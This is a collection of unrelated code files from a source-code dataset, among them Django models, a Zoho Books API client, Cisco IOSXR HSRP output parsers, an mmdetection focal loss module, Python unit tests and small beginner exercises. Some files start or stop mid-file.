return False, 'Invalid interval.'
pair = args[0]
try:
price = client.get_ticker(symbol=pair)['lastPrice']
except BinanceAPIException:
return False, 'Invalid pair.'
try:
enterprice = float(args[2])
if enterprice < 0:
raise ValueError
except ValueError:
return False, 'Invalid enterPrice.'
return [[chat_id, pair, refresh, float(price), int(time()), enterprice], None]
def generate_tradeposition_msg(enterprice, actualprice):
change = actualprice / enterprice
return f'[{"%.2f" % change}]'
| StarcoderdataPython |
5190581 | import warnings
from django.db import models
from django.contrib.postgres.fields import JSONField
from django.utils.functional import cached_property
class BasePBNModel(models.Model):
created_on = models.DateTimeField(auto_now_add=True)
last_updated_on = models.DateTimeField(auto_now=True)
class Meta:
abstract = True
MAX_TEXT_FIELD_LENGTH = 350
class BasePBNMongoDBModel(BasePBNModel):
mongoId = models.CharField(max_length=32, primary_key=True)
status = models.CharField(max_length=32, db_index=True)
verificationLevel = models.CharField(max_length=32, db_index=True)
verified = models.BooleanField(default=False, db_index=True)
versions = JSONField()
# Nazwy pól wyciaganych "na wierzch" do pól obiektu
# ze słownika JSONa (pole 'values')
pull_up_on_save = None
def _pull_up_on_save(self):
for attr in self.pull_up_on_save:
if hasattr(self, f"pull_up_{attr}"):
fn = getattr(self, f"pull_up_{attr}")
v = fn()
else:
v = self.value_or_none("object", attr)
if v is not None:
# Tylko błędne rekordy (takie, które zawieraja pola dlugosci kilkudziesieciu kilobajtow)
# zawieraja bardzo dlugie wpisy. Np jeden rekord w polu 'nazwisko' ma 10 kb nazwisk,
# po przecinku. Oczywiscie, ze sa bledne. PostgreSQL jednakze ma limit na wielkosc
# wiersza indeksu. I tego limitu bedziemy teraz przestrzegali:
if isinstance(v, str):
if len(v) >= MAX_TEXT_FIELD_LENGTH:
v = v[:MAX_TEXT_FIELD_LENGTH]
setattr(self, attr, v)
def save(
self, force_insert=False, force_update=False, using=None, update_fields=None
):
if self.pull_up_on_save:
self._pull_up_on_save()
return super(BasePBNMongoDBModel, self).save(
force_insert=force_insert,
force_update=force_update,
using=using,
update_fields=update_fields,
)
@cached_property
def current_version(self):
if self.versions:
for elem in self.versions:
if elem["current"]:
return elem
def value(self, *path, return_none=False):
v = self.current_version
if v is None:
warnings.warn(
f"Model {self.__class__} with id {self.mongoId} has NO current_version!"
)
if return_none:
return
return "[brak current_version]"
for elem in path:
if elem in v:
v = v[elem]
else:
if return_none:
return None
return f"[brak {elem}]"
return v
def value_or_none(self, *path):
return self.value(*path, return_none=True)
def website(self):
return self.value("object", "website")
class Meta:
abstract = True
| StarcoderdataPython |
1891790 | <filename>Code.py<gh_stars>0
# Finished Program
target=1
while 1:
i=2
prime=True
while i<target:
if (target%i) == 0:
prime=False
break
i=i+1
if (prime):
print(target, "is a prime")
target=target+1
| StarcoderdataPython |
1919944 | """
curso Python 3 - Exercício Python #005
crie um programa que leia um numero inteiro e mostre na tela seu sucessor e antecessor
20.10.2020 - <NAME>
"""
n1 = int(input('Digite um numero inteiro '))
d = n1+1
a = n1-1
print('O numero inteiro digitado foi {}, seu sucessor é {} e antecessor é {}'.format(n1, d, a))
#print('O numero inteiro digitado foi {}, seu sucessor é {} e antecessor é {}'.format(n1, (n1+1), (n1-1)))
| StarcoderdataPython |
8176591 | #$Id$#
from books.util.ZohoHttpClient import ZohoHttpClient
from books.parser.SettingsParser import SettingsParser
from books.api.Api import Api
from json import dumps
base_url = Api().base_url + 'organizations/'
zoho_http_client = ZohoHttpClient()
parser = SettingsParser()
class OrganizationsApi:
"""Organization api is used to
1.List organizations.
2.Get the details of an organization.
3.Create an organization.
4.Update an organization.
"""
def __init__(self, authtoken, organization_id):
"""Initialize Settings Api using authtoken and organization id.
Args:
authtoken(str): User's Authtoken.
organization_id(str): User's Organization id.
"""
self.details = {
'authtoken': authtoken,
'organization_id': organization_id
}
def get_organizations(self):
"""Get list of all organizations.
Returns:
instance: Organizations list object.
"""
resp = zoho_http_client.get(base_url, self.details)
return parser.get_organizations(resp)
def get(self, organization_id):
"""Get organization id.
Args:
organization_id(str): Organization id.
Returns:
instance: Organization object.
"""
url = base_url + organization_id
resp = zoho_http_client.get(url, self.details)
return parser.get_organization(resp)
def create(self, organization):
"""Create an organization.
Args:
organization(instance): Organization object.
Returns:
instance: Organization object.
"""
json_obj = dumps(organization.to_json())
data = {
'JSONString': json_obj
}
resp = zoho_http_client.post(base_url, self.details, data)
return parser.get_organization(resp)
def update(self, organization_id, organization):
"""Update organization.
Args:
organization_id(str): ORganization id.
organization(instance): Organization object.
Returns:
instance: Organization object.
"""
url = base_url + organization_id
json_obj = dumps(organization.to_json())
data = {
'JSONString': json_obj
}
resp = zoho_http_client.put(url, self.details, data)
return parser.get_organization(resp)
| StarcoderdataPython |
3570980 | <reponame>nielsvanhooy/genieparser
""" show_hsrp_statistics.py
IOSXR parsers for the following show commands:
* show hsrp statistics
* show hsrp {interface} statistics
* show hsrp {interface} {group_number} statistics
* show hsrp status
"""
# Python
import re
# Metaparser
from genie.metaparser import MetaParser
from genie.metaparser.util.schemaengine import Schema, Any, Or, Optional
from genie.libs.parser.utils.common import Common
class ShowHsrpStatisticsSchema(MetaParser):
''' Schema for commands:
* show hsrp statistics
'''
schema = {
'hsrp': {
Any(): {
'protocol': {
'active': int,
'standby': int,
'speak': int,
'listen': int,
'learn': int,
'init': int,
},
'packets_sent': {
'total_sent': int,
'hello': int,
'resign': int,
'coup': int,
'adver': int,
},
'valid_packets_received': {
'total_received': int,
'hello': int,
'resign': int,
'coup': int,
'adver': int,
},
'invalid_packets_received': {
'total_invalid_received': int,
'too_long': int,
'too_short': int,
'mismatching_unsupported_versions': int,
'invalid_opcode': int,
'unknown_group': int,
'inoperational_group': int,
'conflicting_source_ip': int,
'failed_authentication': int,
'invalid_hello_time': int,
'mismatching_virtual_ip': int,
},
}
}
}
class ShowHsrpStatistics(ShowHsrpStatisticsSchema):
''' Parser for commands:
* show hsrp statistics
'''
cli_command = [
'show hsrp statistics',
'show hsrp {interface} statistics',
'show hsrp {interface} {group_number} statistics'
]
def cli(self, interface=None, group_number=None, output=None):
if output is None:
if interface and not group_number:
cmd = self.cli_command[1].format(interface=interface)
elif interface and group_number:
cmd = self.cli_command[2].format(interface=interface,group_number=group_number)
else:
cmd = self.cli_command[0]
out = self.device.execute(cmd)
else:
out = output
# Protocol:
r1 = re.compile(r'(?P<protocol>Protocol):')
# Transitions to Active 2
r2 = re.compile(r'Transitions +to +Active: +(?P<active>\d+)')
# Transitions to Standby 2
r3 = re.compile(r'Transitions +to +Standby: +(?P<standby>\d+)')
# Transitions to Speak 0
r4 = re.compile(r'Transitions +to +Speak: +(?P<speak>\d+)')
# Transitions to Listen 2
r5 = re.compile(r'Transitions +to +Listen: +(?P<listen>\d+)')
# Transitions to Learn 0
r6 = re.compile(r'Transitions +to +Learn: +(?P<learn>\d+)')
# Transitions to Init 0
r7 = re.compile(r'Transitions +to\s+Init: +(?P<init>\d+)')
# Packets Sent: 12
r8 = re.compile(r'(?P<packets_sent>Packets Sent): +(?P<total_sent>\d+)')
# Hello: 7
r9 = re.compile(r'Hello: +(?P<hello>\d+)')
# Resign: 0
r10 = re.compile(r'Resign: +(?P<resign>\d+)')
# Coup: 2
r11 = re.compile(r'Coup: +(?P<coup>\d+)')
# Adver: 3
r12 = re.compile(r'Adver: +(?P<adver>\d+)')
# Valid Packets Received: 13
r13 = re.compile(r'Valid Packets Received: +(?P<total_received>\d+)')
# Invalid Packets Received: 0
r14 = re.compile(r'(?P<invalid_packets_received>Invalid Packets Received:)'
r' +(?P<total_invalid_received>\d+)')
# Too long: 0
r15 = re.compile(r'Too long: +(?P<too_long>\d+)')
# Too short: 0
r16 = re.compile(r'Too short: +(?P<too_short>\d+)')
# Mismatching/unsupported versions: 0
r17 = re.compile(r'Mismatching\/unsupported versions:'
r' +(?P<mismatching_unsupported_versions>\d+)')
# Invalid opcode: 0
r18 = re.compile(r'Invalid opcode: +(?P<invalid_opcode>\d+)')
# Unknown group: 0
r19 = re.compile(r'Unknown group: +(?P<unknown_group>\d+)')
# Inoperational group: 0
r20 = re.compile(r'Inoperational group: +(?P<inoperational_group>\d+)')
# Conflicting Source IP: 0
r21 = re.compile(r'Conflicting Source IP: +(?P<conflicting_source_ip>\d+)')
# Failed Authentication: 2
r22 = re.compile(r'Failed Authentication: +(?P<failed_authentication>\d+)')
# Invalid Hello Time: 0
r23 = re.compile(r'Invalid Hello Time: +(?P<invalid_hello_time>\d+)')
# Mismatching Virtual IP: 0
r24 = re.compile(r'Mismatching Virtual IP: +(?P<mismatching_virtual_ip>\d+)')
parsed_dict = {}
vrf = 'default'
for line in out.splitlines():
line = line.strip()
#Protocol:
m = r1.match(line)
if m:
group = m.groupdict()
statistics_dict = parsed_dict.setdefault('hsrp', {}).setdefault('statistics', {})
protocol_dict = statistics_dict.setdefault('protocol', {})
continue
# Transitions to Active 2
m = r2.match(line)
if m:
group = m.groupdict()
protocol_dict['active'] = int(group['active'])
continue
# Transitions to Standby 2
m = r3.match(line)
if m:
group = m.groupdict()
protocol_dict['standby'] = int(group['standby'])
continue
# Transitions to Speak 0
m = r4.match(line)
if m:
group = m.groupdict()
protocol_dict['speak'] = int(group['speak'])
continue
# Transitions to Listen 2
m = r5.match(line)
if m:
group = m.groupdict()
protocol_dict['listen'] = int(group['listen'])
continue
#Transitions to Learn 0
m = r6.match(line)
if m:
group = m.groupdict()
protocol_dict['learn'] = int(group['learn'])
continue
# Transitions to Init 0
m = r7.match(line)
if m:
group = m.groupdict()
protocol_dict['init'] = int(group['init'])
continue
# Packets Sent: 12
m = r8.match(line)
if m:
group = m.groupdict()
packets_sent_rec_dict = statistics_dict.setdefault('packets_sent', {})
packets_sent_rec_dict['total_sent'] = int(group['total_sent'])
continue
# Valid Packets Received: 13
m = r13.match(line)
if m:
group = m.groupdict()
packets_sent_rec_dict = statistics_dict.setdefault('valid_packets_received', {})
packets_sent_rec_dict['total_received'] = int(group['total_received'])
continue
# Transitions to Learn 0
m = r9.match(line)
if m:
group = m.groupdict()
packets_sent_rec_dict['hello'] = int(group['hello'])
continue
# Resign: 0
m = r10.match(line)
if m:
group = m.groupdict()
packets_sent_rec_dict['resign'] = int(group['resign'])
continue
# Coup: 2
m = r11.match(line)
if m:
group = m.groupdict()
packets_sent_rec_dict['coup'] = int(group['coup'])
continue
# Adver: 3
m = r12.match(line)
if m:
group = m.groupdict()
packets_sent_rec_dict['adver'] = int(group['adver'])
continue
# Invalid packets received: 0
m = r14.match(line)
if m:
group = m.groupdict()
invalid_packets_received_dict = statistics_dict.setdefault('invalid_packets_received', {})
invalid_packets_received_dict['total_invalid_received'] = int(group['total_invalid_received'])
continue
# Too long: 0
m = r15.match(line)
if m:
group = m.groupdict()
invalid_packets_received_dict['too_long'] = int(group['too_long'])
continue
# Too short: 0
m = r16.match(line)
if m:
group = m.groupdict()
invalid_packets_received_dict['too_short'] = int(group['too_short'])
continue
# Mismatching/unsupported versions: 0
m = r17.match(line)
if m:
group = m.groupdict()
invalid_packets_received_dict['mismatching_unsupported_versions'] = int(group['mismatching_unsupported_versions'])
continue
# Invalid opcode: 0
m = r18.match(line)
if m:
group = m.groupdict()
invalid_packets_received_dict['invalid_opcode'] = int(group['invalid_opcode'])
continue
# Unknown group: 0
m = r19.match(line)
if m:
group = m.groupdict()
invalid_packets_received_dict['unknown_group'] = int(group['unknown_group'])
continue
# Inoperational group: 0
m = r20.match(line)
if m:
group = m.groupdict()
invalid_packets_received_dict['inoperational_group'] = int(group['inoperational_group'])
continue
# Conflicting Source IP: 0
m = r21.match(line)
if m:
group = m.groupdict()
invalid_packets_received_dict['conflicting_source_ip'] = int(group['conflicting_source_ip'])
continue
# Failed Authentication: 2
m = r22.match(line)
if m:
group = m.groupdict()
invalid_packets_received_dict['failed_authentication'] = int(group['failed_authentication'])
continue
# Invalid Hello Time: 0
m = r23.match(line)
if m:
group = m.groupdict()
invalid_packets_received_dict['invalid_hello_time'] = int(group['invalid_hello_time'])
continue
# Mismatching Virtual IP: 0
m = r24.match(line)
if m:
group = m.groupdict()
invalid_packets_received_dict['mismatching_virtual_ip'] = int(group['mismatching_virtual_ip'])
continue
return parsed_dict
class ShowHsrpStatusSchema(MetaParser):
''' Schema for commands:
* show hsrp status
'''
schema = {
'status': {
'clock_time': str,
'process_started': str,
'checkpoint_recovered': str,
'issu_completed': str,
'issu_aborted': str,
'mode': {
Any(): {
'mode1_type': str,
'issu_state': str,
'big_bang_notification': str,
},
},
}
}
class ShowHsrpStatus(ShowHsrpStatusSchema):
''' Parser for commands:
* show hsrp status
'''
cli_command = 'show hsrp status'
def cli(self, output=None):
if output is None:
output = self.device.execute(self.cli_command)
# Sun Mar 27 20:41:21.974 UTC
r1 = re.compile(r'(?P<clock_time>\S{3}\s+\S{3}\s+\d+\s+\d+\:\d+\:\d+\.\d+\s+\S+)$')
# Process started at Mar 10 20:37:22.290 UTC
r2 = re.compile(r'^Process started at +(?P<process_started>[\w\s\.\:]+)$')
# Checkpoint recovered Mar 10 20:37:22.385 UTC
r3 = re.compile(r'^Checkpoint recovered +(?P<checkpoint_recovered>[\w\s\.\:]+)$')
# Mode is Primary
r4 = re.compile(r'Mode +is +(?P<mode_state>[a-zA-Z]+)$')
# ISSU is not in progress
r5 = re.compile(r'ISSU is +(?P<issu_state>[a-zA-Z ]+)$')
# Big Bang notification received Never
r6 = re.compile(r'Big Bang notification +(?P<big_bang_notification>[a-zA-Z ]+)$')
# ISSU completed Never
r7 = re.compile(r'^ISSU completed +(?P<issu_completed>[a-zA-Z ]+)$')
# ISSU aborted Never
r8 = re.compile(r'^ISSU aborted +(?P<issu_aborted>[a-zA-Z ]+)$')
parsed_dict = {}
for line in output.splitlines():
line = line.strip()
# Sun Mar 27 20:41:21.974 UTC
m = r1.match(line)
if m:
group = m.groupdict()
status_dict = parsed_dict.setdefault('status', {})
status_dict['clock_time'] = group['clock_time']
continue
# Process started at Mar 10 20:37:22.290 UTC
m = r2.match(line)
if m:
group = m.groupdict()
status_dict['process_started'] = group['process_started']
continue
# Checkpoint recovered Mar 10 20:37:22.385 UTC
m = r3.match(line)
if m:
group = m.groupdict()
status_dict['checkpoint_recovered'] = group['checkpoint_recovered']
continue
# Mode is Primary
m = r4.match(line)
if m:
group = m.groupdict()
model_type = group['mode_state'].lower()
model_dict = status_dict.setdefault('mode', {}).setdefault(model_type, {})
model_dict['mode1_type'] = model_type
continue
# ISSU is not in progress
m = r5.match(line)
if m:
group = m.groupdict()
model_dict['issu_state'] = group['issu_state']
continue
#Big Bang notification received Never
m = r6.match(line)
if m:
group = m.groupdict()
model_dict['big_bang_notification'] = group['big_bang_notification']
continue
# ISSU completed Never
m = r7.match(line)
if m:
group = m.groupdict()
status_dict['issu_completed'] = group['issu_completed']
continue
# ISSU aborted Never
m = r8.match(line)
if m:
group = m.groupdict()
status_dict['issu_aborted'] = group['issu_aborted']
continue
return parsed_dict
| StarcoderdataPython |
1958059 | import sys
sys.setrecursionlimit(10000000)
input=lambda : sys.stdin.readline().rstrip()
n = int(input())
a = list(map(int,input().split()))
if 1 not in a:
print(-1)
exit()
max_len = 0
p = 1
for i in range(n):
if a[i] == p:
max_len += 1
p += 1
print(len(a) - max_len) | StarcoderdataPython |
4984403 | <reponame>marcovalenti/mmdetection
import torch
import torch.nn as nn
import torch.nn.functional as F
from mmcv.ops import sigmoid_focal_loss as _sigmoid_focal_loss
from mmcv.ops import softmax_focal_loss as _softmax_focal_loss #for diseases
from ..builder import LOSSES
from .utils import weight_reduce_loss
#DEBUG
from torch import Tensor
from typing import Optional, Sequence
# This method is only for debugging
def py_sigmoid_focal_loss(pred,
target,
weight=None,
gamma=2.0,
alpha=0.25,
reduction='mean',
avg_factor=None):
"""PyTorch version of `Focal Loss <https://arxiv.org/abs/1708.02002>`_.
Args:
pred (torch.Tensor): The prediction with shape (N, C), C is the
number of classes
target (torch.Tensor): The learning label of the prediction.
weight (torch.Tensor, optional): Sample-wise loss weight.
gamma (float, optional): The gamma for calculating the modulating
factor. Defaults to 2.0.
alpha (float, optional): A balanced form for Focal Loss.
Defaults to 0.25.
reduction (str, optional): The method used to reduce the loss into
a scalar. Defaults to 'mean'.
avg_factor (int, optional): Average factor that is used to average
the loss. Defaults to None.
"""
pred_sigmoid = pred.sigmoid()
target = target.type_as(pred)
pt = (1 - pred_sigmoid) * target + pred_sigmoid * (1 - target)
focal_weight = (alpha * target + (1 - alpha) *
(1 - target)) * pt.pow(gamma)
loss = F.binary_cross_entropy_with_logits(
pred, target, reduction='none') * focal_weight
if weight is not None:
if weight.shape != loss.shape:
if weight.size(0) == loss.size(0):
# For most cases, weight is of shape (num_priors, ),
# which means it does not have the second axis num_class
weight = weight.view(-1, 1)
else:
# Sometimes, weight per anchor per class is also needed. e.g.
# in FSAF. But it may be flattened of shape
# (num_priors x num_class, ), while loss is still of shape
# (num_priors, num_class).
assert weight.numel() == loss.numel()
weight = weight.view(loss.size(0), -1)
assert weight.ndim == loss.ndim
loss = weight_reduce_loss(loss, weight, reduction, avg_factor)
return loss
def sigmoid_focal_loss(pred,
target,
weight=None,
gamma=2.0,
alpha=0.25,
reduction='mean',
avg_factor=None):
r"""A warpper of cuda version `Focal Loss
<https://arxiv.org/abs/1708.02002>`_.
Args:
pred (torch.Tensor): The prediction with shape (N, C), C is the number
of classes.
target (torch.Tensor): The learning label of the prediction.
weight (torch.Tensor, optional): Sample-wise loss weight.
gamma (float, optional): The gamma for calculating the modulating
factor. Defaults to 2.0.
alpha (float, optional): A balanced form for Focal Loss.
Defaults to 0.25.
reduction (str, optional): The method used to reduce the loss into
a scalar. Defaults to 'mean'. Options are "none", "mean" and "sum".
avg_factor (int, optional): Average factor that is used to average
the loss. Defaults to None.
"""
# Function.apply does not accept keyword arguments, so the decorator
# "weighted_loss" is not applicable
loss = _sigmoid_focal_loss(pred.contiguous(), target, gamma, alpha, None,
'none')
if weight is not None:
if weight.shape != loss.shape:
if weight.size(0) == loss.size(0):
# For most cases, weight is of shape (num_priors, ),
# which means it does not have the second axis num_class
weight = weight.view(-1, 1)
else:
# Sometimes, weight per anchor per class is also needed. e.g.
# in FSAF. But it may be flattened of shape
# (num_priors x num_class, ), while loss is still of shape
# (num_priors, num_class).
assert weight.numel() == loss.numel()
weight = weight.view(loss.size(0), -1)
assert weight.ndim == loss.ndim
loss = weight_reduce_loss(loss, weight, reduction, avg_factor)
return loss
#added for diseases
def softmax_focal_loss(pred,
target,
weight,
gamma=2.0,
alpha=0.25,
reduction='mean',
class_weight=None,
avg_factor=None):
r"""A warpper of cuda version `Focal Loss
<https://arxiv.org/abs/1708.02002>`_.
Args:
pred (torch.Tensor): The prediction with shape (N, C), C is the number
of classes.
target (torch.Tensor): The learning label of the prediction.
weight (torch.Tensor): Sample-wise loss weight.
gamma (float, optional): The gamma for calculating the modulating
factor. Defaults to 2.0.
alpha (float, optional): A balanced form for Focal Loss.
Defaults to 0.25.
reduction (str, optional): The method used to reduce the loss into
a scalar. Defaults to 'mean'. Options are "none", "mean" and "sum".
avg_factor (int, optional): Average factor that is used to average
the loss. Defaults to None.
class_weight (list[float], optional): The weight for each class.
"""
#loss = _softmax_focal_loss(pred.contiguous(), target, gamma, alpha, weight,
# reduction)
#NOTE: in this case sum is used for a bug in softmax_focal_loss
#that doesn't consider the case of reduction = none. For this reason
#weight_reduce_loss cannot be used
loss = _softmax_focal_loss(pred.contiguous(), target, gamma, alpha, class_weight,
'sum')
# apply weights and do the reduction
if weight is not None:
weight = weight.float()
#import ipdb; ipdb.set_trace()
#loss = weight_reduce_loss(loss, weight, reduction, avg_factor)
return loss / avg_factor
@LOSSES.register_module()
class FocalLoss(nn.Module):
def __init__(self,
use_sigmoid=True,
gamma=2.0,
alpha=0.25,
reduction='mean',
class_weight=None,
loss_weight=1.0):
"""`Focal Loss <https://arxiv.org/abs/1708.02002>`_
Args:
use_sigmoid (bool, optional): Whether to the prediction is
used for sigmoid or softmax. Defaults to True.
gamma (float, optional): The gamma for calculating the modulating
factor. Defaults to 2.0.
alpha (float, optional): A balanced form for Focal Loss.
Defaults to 0.25.
reduction (str, optional): The method used to reduce the loss into
a scalar. Defaults to 'mean'. Options are "none", "mean" and
"sum".
loss_weight (float, optional): Weight of loss. Defaults to 1.0.
"""
super(FocalLoss, self).__init__()
#assert use_sigmoid is True, 'Only sigmoid focal loss supported now.'
self.use_sigmoid = use_sigmoid
self.gamma = gamma
self.alpha = alpha
self.reduction = reduction
self.class_weight = class_weight
self.loss_weight = loss_weight
def forward(self,
pred,
target,
weight=None,
avg_factor=None,
reduction_override=None):
"""Forward function.
Args:
pred (torch.Tensor): The prediction.
target (torch.Tensor): The learning label of the prediction.
weight (torch.Tensor, optional): The weight of loss for each
prediction. Defaults to None.
avg_factor (int, optional): Average factor that is used to average
the loss. Defaults to None.
reduction_override (str, optional): The reduction method used to
override the original reduction method of the loss.
Options are "none", "mean" and "sum".
Returns:
torch.Tensor: The calculated loss
"""
assert reduction_override in (None, 'none', 'mean', 'sum')
reduction = (
reduction_override if reduction_override else self.reduction)
if self.use_sigmoid:
if torch.cuda.is_available() and pred.is_cuda:
calculate_loss_func = sigmoid_focal_loss
else:
num_classes = pred.size(1)
target = F.one_hot(target, num_classes=num_classes + 1)
target = target[:, :num_classes]
calculate_loss_func = py_sigmoid_focal_loss
loss_cls = self.loss_weight * calculate_loss_func(
pred,
target,
weight,
gamma=self.gamma,
alpha=self.alpha,
reduction=reduction,
avg_factor=avg_factor)
else:
#raise NotImplementedError
if torch.cuda.is_available() and pred.is_cuda:
calculate_loss_func = softmax_focal_loss
else:
raise NotImplementedError
if self.class_weight is not None:
class_weight = pred.new_tensor(
self.class_weight, device=pred.device)
else:
class_weight = None
loss_cls = self.loss_weight * calculate_loss_func(
pred,
target,
weight,
gamma=self.gamma,
alpha=self.alpha,
class_weight=class_weight,
reduction=reduction,
avg_factor=avg_factor)
return loss_cls
#for debugging
@LOSSES.register_module()
class py_FocalLoss(nn.Module):
""" Focal Loss, as described in https://arxiv.org/abs/1708.02002.
It is essentially an enhancement to cross entropy loss and is
useful for classification tasks when there is a large class imbalance.
x is expected to contain raw, unnormalized scores for each class.
y is expected to contain class labels.
Shape:
- x: (batch_size, C) or (batch_size, C, d1, d2, ..., dK), K > 0.
- y: (batch_size,) or (batch_size, d1, d2, ..., dK), K > 0.
"""
def __init__(self,
alpha: Optional[Tensor] = None,
gamma: float = 0.,
reduction: str = 'mean',
ignore_index: int = -100):
"""Constructor.
Args:
alpha (Tensor, optional): Weights for each class. Defaults to None.
gamma (float, optional): A constant, as described in the paper.
Defaults to 0.
reduction (str, optional): 'mean', 'sum' or 'none'.
Defaults to 'mean'.
ignore_index (int, optional): class label to ignore.
Defaults to -100.
"""
if reduction not in ('mean', 'sum', 'none'):
raise ValueError(
'Reduction must be one of: "mean", "sum", "none".')
super().__init__()
self.alpha = alpha
self.gamma = gamma
self.ignore_index = ignore_index
self.reduction = reduction
self.nll_loss = nn.NLLLoss(
weight=alpha, reduction='none', ignore_index=ignore_index)
def __repr__(self):
arg_keys = ['alpha', 'gamma', 'ignore_index', 'reduction']
arg_vals = [self.__dict__[k] for k in arg_keys]
arg_strs = [f'{k}={v}' for k, v in zip(arg_keys, arg_vals)]
arg_str = ', '.join(arg_strs)
return f'{type(self).__name__}({arg_str})'
def forward(self, x: Tensor, y: Tensor) -> Tensor:
if x.ndim > 2:
# (N, C, d1, d2, ..., dK) --> (N * d1 * ... * dK, C)
c = x.shape[1]
x = x.permute(0, *range(2, x.ndim), 1).reshape(-1, c)
# (N, d1, d2, ..., dK) --> (N * d1 * ... * dK,)
y = y.view(-1)
unignored_mask = y != self.ignore_index
y = y[unignored_mask]
if len(y) == 0:
return 0.
x = x[unignored_mask]
# compute weighted cross entropy term: -alpha * log(pt)
# (alpha is already part of self.nll_loss)
log_p = F.log_softmax(x, dim=-1)
ce = self.nll_loss(log_p, y)
# get true class column from each row
all_rows = torch.arange(len(x))
log_pt = log_p[all_rows, y]
# compute focal term: (1 - pt)^gamma
pt = log_pt.exp()
focal_term = (1 - pt)**self.gamma
# the full loss: -alpha * ((1 - pt)^gamma) * log(pt)
loss = focal_term * ce
if self.reduction == 'mean':
loss = loss.mean()
elif self.reduction == 'sum':
loss = loss.sum()
return loss
def focal_loss(alpha: Optional[Sequence] = None,
gamma: float = 0.,
reduction: str = 'mean',
ignore_index: int = -100,
device='cpu',
dtype=torch.float32) -> FocalLoss:
"""Factory function for FocalLoss.
Args:
alpha (Sequence, optional): Weights for each class. Will be converted
to a Tensor if not None. Defaults to None.
gamma (float, optional): A constant, as described in the paper.
Defaults to 0.
reduction (str, optional): 'mean', 'sum' or 'none'.
Defaults to 'mean'.
ignore_index (int, optional): class label to ignore.
Defaults to -100.
device (str, optional): Device to move alpha to. Defaults to 'cpu'.
dtype (torch.dtype, optional): dtype to cast alpha to.
Defaults to torch.float32.
Returns:
A FocalLoss object
"""
if alpha is not None:
if not isinstance(alpha, Tensor):
alpha = torch.tensor(alpha)
alpha = alpha.to(device=device, dtype=dtype)
fl = FocalLoss(
alpha=alpha,
gamma=gamma,
reduction=reduction,
ignore_index=ignore_index)
return fl
| StarcoderdataPython |
9647385 | from grimp.domain.valueobjects import Module, DirectImport
class TestModule:
def test_repr(self):
module = Module("foo.bar")
assert repr(module) == "<Module: foo.bar>"
def test_equals(self):
a = Module("foo.bar")
b = Module("foo.bar")
c = Module("foo.bar.baz")
assert a == b
assert a != c
# Also non-Module instances should not be treated as equal.
assert a != "foo"
def test_hash(self):
a = Module("foo.bar")
b = Module("foo.bar")
c = Module("foo.bar.baz")
assert hash(a) == hash(b)
assert hash(a) != hash(c)
def test_package_name(self):
assert Module("foo.bar.baz").package_name == "foo"
class TestDirectImport:
def test_repr(self):
import_path = DirectImport(
importer=Module("foo"),
imported=Module("bar"),
line_number=10,
line_contents="import bar",
)
assert repr(import_path) == "<DirectImport: foo -> bar (l. 10)>"
def test_equals(self):
a = DirectImport(
importer=Module("foo"),
imported=Module("bar"),
line_number=10,
line_contents="import bar",
)
b = DirectImport(
importer=Module("foo"),
imported=Module("bar"),
line_number=10,
line_contents="import bar",
)
c = DirectImport(
importer=Module("foo"),
imported=Module("baz"),
line_number=10,
line_contents="import bar",
)
d = DirectImport(
importer=Module("foobar"),
imported=Module("bar"),
line_number=10,
line_contents="import bar",
)
e = DirectImport(
importer=Module("foo"),
imported=Module("bar"),
line_number=11,
line_contents="import bar",
)
f = DirectImport(
importer=Module("foo"),
imported=Module("bar"),
line_number=10,
line_contents="from . import bar",
)
assert a == b
assert a != c
assert a != d
assert a != e
assert a != f
# Also non-DirectImport instances should not be treated as equal.
assert a != "foo"
def test_hash(self):
a = DirectImport(
importer=Module("foo"),
imported=Module("bar"),
line_number=10,
line_contents="import bar",
)
b = DirectImport(
importer=Module("foo"),
imported=Module("bar"),
line_number=10,
line_contents="import bar",
)
c = DirectImport(
importer=Module("foo"),
imported=Module("baz"),
line_number=10,
line_contents="import bar",
)
d = DirectImport(
importer=Module("foobar"),
imported=Module("bar"),
line_number=10,
line_contents="import bar",
)
e = DirectImport(
importer=Module("foo"),
imported=Module("bar"),
line_number=11,
line_contents="import bar",
)
f = DirectImport(
importer=Module("foo"),
imported=Module("bar"),
line_number=10,
line_contents="from . import bar",
)
assert hash(a) == hash(b)
assert hash(a) != hash(c)
assert hash(a) != hash(d)
assert hash(a) != hash(e)
assert hash(a) != hash(f)
| StarcoderdataPython |
3406603 | import struct
class DaapNumericReader(object):
"""This class reads raw DAAP data and convert it to number
"""
@classmethod
def uint8(cls, b):
"""Read 1 byte, then convert to an unsigned big-endian number
"""
n, = struct.unpack('>B', b)
return n
@classmethod
def uint16(cls, b):
"""Read 2 bytes, then convert to an unsigned big-endian number
"""
n, = struct.unpack('>H', b)
return n
@classmethod
def uint32(cls, b):
"""Read 4 bytes, then convert to an unsigned big-endian number
"""
n, = struct.unpack('>I', b)
return n
@classmethod
def uint64(cls, b):
"""Read 8 bytes, then convert to an unsigned big-endian number
"""
n, = struct.unpack('>Q', b)
return n
@classmethod
def int8(cls, b):
"""Read 1 byte, then convert to a signed big-endian number
"""
n, = struct.unpack('>b', b)
return n
@classmethod
def int16(cls, b):
"""Read 2 bytes, then convert to a signed big-endian number
"""
n, = struct.unpack('>h', b)
return n
@classmethod
def int32(cls, b):
"""Read 4 bytes, then convert to a signed big-endian number
"""
n, = struct.unpack('>i', b)
return n
@classmethod
def int64(cls, b):
"""Read 8 bytes, then convert to a signed big-endian number
"""
n, = struct.unpack('>q', b)
return n
| StarcoderdataPython |
1852199 | <gh_stars>1-10
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""Fibonacci numbers test module."""
__author__ = "<NAME>"
from pytest import mark, raises
from fibonacci_gen import fibonacci_gen as fib_gen
from fibonacci_rec import fibonacci_rec as fib_rec
from even_fibonacci_gen import even_fibonacci_gen as efib_gen
@mark.parametrize("nonint", [2.5, "3", [4]])
def test_non_integers(nonint):
"""Test non-integers."""
with raises(TypeError):
fib_gen(nonint)
with raises(TypeError):
fib_rec(nonint)
with raises(TypeError):
efib_gen(nonint)
@mark.parametrize("invint", [-2, 0])
def test_invalid_integers(invint):
"""Test invalid integers."""
with raises(ValueError):
fib_gen(invint)
with raises(ValueError):
fib_rec(invint)
with raises(ValueError):
efib_gen(invint)
@mark.parametrize("nth", list(range(1, 101)))
def test_fibonacci_nth(nth):
"""Test n first terms."""
infibgen = fib_gen()
infslice = [next(infibgen) for _ in range(nth)]
fibrec = [fib_rec(term) for term in range(1, nth + 1)]
fibgen = list(fib_gen(nth))
assert fibgen == infslice == fibrec
@mark.parametrize(
"nth, res",
[
(1, [0]),
(2, [0, 2]),
